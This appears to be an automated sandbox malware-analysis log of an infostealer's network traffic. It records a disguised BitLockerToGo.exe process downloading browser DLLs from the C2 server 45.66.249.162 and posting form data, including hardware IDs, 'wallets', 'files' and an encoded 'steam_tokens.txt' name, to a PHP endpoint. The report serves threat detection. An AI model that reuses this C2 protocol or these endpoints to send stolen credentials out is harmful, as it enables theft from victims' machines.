                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: 45.66.249.162Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="file"------JKECFCFBGDHIECAAFIID--
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDBHost: 45.66.249.162Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 2d 2d 0d 0a Data Ascii: ------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="file"------IDHIDBAEGIIIDHJKEGDB--
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/freebl3.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/mozglue.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/mozglue.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/msvcp140.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/nss3.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/softokn3.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/vcruntime140.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJHost: 45.66.249.162Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIHost: 45.66.249.162Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 2d 2d 0d 0a Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="message"wallets------BGIJDGCAEBFIIECAKFHI--
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBHost: 45.66.249.162Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 2d 2d 0d 0a Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="message"files------IDHDGDHJEGHIDGDHCGCB--
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCBHost: 45.66.249.162Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 2d 2d 0d 0a Data Ascii: ------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="file"------FIJECAEHJJJKJKFIDGCB--
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBAHost: 45.66.249.162Content-Length: 114483Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGCHost: 45.66.249.162Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="message"ybncbhylepme------HIDHDGDHJEGHIDGDHCGC--
                    Source: global trafficHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEBHost: 45.66.249.162Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 2d 2d 0d 0a Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AAEHIDAKECFIEBGDHJEB--
                    Source: Joe Sandbox ViewASN Name: FREERANGECLOUDCA FREERANGECLOUDCA
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49707 -> 45.66.249.162:80
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.66.249.162
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03004FB0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,2_2_03004FB0
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.66.249.162Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/sqlite3.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/freebl3.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/mozglue.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/mozglue.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/msvcp140.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/nss3.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/softokn3.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /55145c8889ec57f2/vcruntime140.dll HTTP/1.1Host: 45.66.249.162Cache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST /9e6547173a597645.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBHost: 45.66.249.162Content-Length: 208Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 38 33 34 38 30 33 38 42 44 30 38 35 36 34 33 38 36 38 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 76 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 2d 2d 0d 0a Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="hwid"938348038BD0856438680------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="build"v1------IDHDGDHJEGHIDGDHCGCB--
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/freebl3.dll
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/mozglue.dll
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/mozglue.dllz
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/msvcp140.dll
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/nss3.dll
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/nss3.dll88
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/softokn3.dll
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/softokn3.dll4
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/sqlite3.dll
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/sqlite3.dllH
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/vcruntime140.dll
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/55145c8889ec57f2/vcruntime140.dll6
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.php
                    Source: BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.php&V
                    Source: BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.php)S
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.php6
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpF
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpHIDBAEGIIIDHJKEGDB
                    Source: BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpOST
                    Source: BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpgV
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpition:
                    Source: BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpl)
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpndowsApps
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpoinomi
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpowser
                    Source: BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phppV
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpr
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.00000000035A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phprbird
                    Source: BitLockerToGo.exe, 00000002.00000002.1852878198.00000000296C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162/9e6547173a597645.phpyV
                    Source: BitLockerToGo.exe, 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.1621
                    Source: BitLockerToGo.exe, 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://45.66.249.162CAEBA
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
